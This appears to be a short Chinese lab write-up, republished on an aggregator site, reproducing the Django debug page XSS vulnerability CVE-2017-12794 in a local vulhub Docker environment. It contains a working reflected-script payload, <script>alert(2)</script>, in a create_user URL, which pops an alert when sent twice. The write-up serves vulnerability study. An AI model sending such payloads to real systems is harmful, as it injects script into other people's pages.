Django debug page XSS漏洞(CVE-2017-12794)

Posted 番茄酱料

tags:

篇首语:本文由小常识网(cha138.com)小编为大家整理,主要介绍了Django debug page XSS漏洞(CVE-2017-12794)相关的知识,希望对你有一定的参考价值。

复现环境:vulhub
1.开启该环境
命令:docker-compose up -d
在这里插入图片描述
2.访问网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>
在这里插入图片描述
显示成功创建一个用户
3.再次访问该网址:127.0.0.1:8000/create_user/?username=<script>alert(2)</script>
在这里插入图片描述
弹出XSS弹窗。

以上是关于Django debug page XSS漏洞(CVE-2017-12794)的主要内容,如果未能解决你的问题,请参考以下文章

Django debug page XSS漏洞(CVE-2017-12794)

Django debug page XSS漏洞(CVE-2017-12794)

Django debug page XSS漏洞(CVE-2017-12794)

Django debug page XSS漏洞(CVE-2017-12794)

XSS 漏洞:<wslite>

XSS事件